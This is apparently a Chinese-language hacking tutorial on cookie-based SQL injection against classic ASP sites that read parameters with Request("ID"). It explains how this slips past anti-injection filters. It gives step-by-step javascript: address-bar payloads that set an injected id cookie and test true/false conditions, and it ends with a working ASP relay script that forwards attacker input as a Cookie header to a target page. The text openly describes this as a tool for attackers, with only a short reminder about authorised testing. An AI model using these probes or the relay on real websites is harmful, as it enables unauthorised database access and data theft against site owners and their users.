Cookies注入
如今,许多网站都添加了防注入系统代码,使得常规的注入语句难以成功注入。通用的防注入系统固然不错,但大部分都忽略了对Cookies的过滤,这就为Cookies注入留下了可乘之机。
一、Cookies注入原理剖析
我们先来探究在何种情况下会出现Cookies注入。如果你熟悉ASP编程,应该知道Request.QueryString
(用于GET请求)或Request.Form
(用于POST请求),它们用于读取用户发送给WEB服务器的指定键中的值。有时,为了简化代码,我们可能会写成ID = Request("ID")
,这种写法虽然简洁,却隐藏着问题。
WEB服务器读取数据时,会先从GET请求中获取数据,若GET中没有对应数据,再从POST请求中获取,最后还会从Cookies中获取。然而,现有的防注入系统通常只检测GET和POST请求中的数据,一旦发现特殊字符(这里指注入字符),就会禁止数据提交,却忽略了对Cookies数据的检测 。这就导致了Cookies注入的可能性。
二、Cookies注入测试方法
那么,如何测试一个网站是否存在Cookies注入问题呢?以下通过示例进行说明(示例地址仅为演示,并非真实地址)。
假设存在这样一个地址:http://*****.2008.***.com/1.asp?id=88
。如果仅输入*****.2008.***.com/1.asp
,将无法看到预期数据,因为缺少参数。为了检测是否存在Cookies注入问题(即是否存在Request("XXX")
这种格式带来的漏洞),我们可以按以下步骤操作:
- 首先,使用IE浏览器输入
*****.2008.***.com/1.asp
加载网页,由于未输入参数,此时页面显示不正常。 接着,在地址栏输入框中输入以下代码:
javascript:alert(document.cookie="id="+escape("88"));
按下回车键后,会弹出一个对话框,内容为
id = 88
。然后刷新网页,如果页面能够正常显示,这表明服务端使用了Request("ID")
这种格式来收集数据,此时就具备了尝试Cookies注入的条件。继续在地址栏输入框中输入:
javascript:alert(document.cookie="id="+escape("88 and 2=2"));
刷新页面,如果显示正常,可以继续下一步测试。
再输入:
javascript:alert(document.cookie="id="+escape("88 and 3=2"));
再次刷新页面,如果页面显示不正常,这就意味着存在Cookies注入漏洞。
需要注意的是,如果程序员显式使用Request.QueryString
或Request.Form
获取参数,那么就无法利用Cookies绕过防注入系统进行注入,因为服务程序会直接从GET或POST请求中读取数据,Cookies注入也就无从下手 。
三、后记
Cookie注入并非一项新技术,但在某些情况下,它仍然是一种有效的攻击手段。或许在未来的某一天,防注入系统会将Cookies注入检测纳入其中。
当然,上述只是Cookies注入的一种常见思路,实际上Cookies注入还有多种形式,大家可以在此基础上发散思维进行研究。同时也要明白,Cookies注入并非万能,在很多情况下并不适用。
最后,附上一个用于Cookies注入的工具代码,它能够辅助完成Cookies注入过程:
<%
Str = "xxxid="&escape(request("Holmesian"))
Url = "http://*****.2008.***.com/go.asp"
response.write PostData(Url,Str)
Function PostData(PostUrl,PostCok)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.SetRequestHeader "Cookie",PostCok
.Send
PostData =.ResponseBody
End With
Set Http = Nothing
PostData = bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
这个工具主要用于转接Cookies注入,通过设置特定的Cookie值并发送请求,帮助攻击者尝试利用可能存在的Cookies注入漏洞。但请务必记住,进行此类测试应在合法授权的环境下进行,以避免违反法律法规。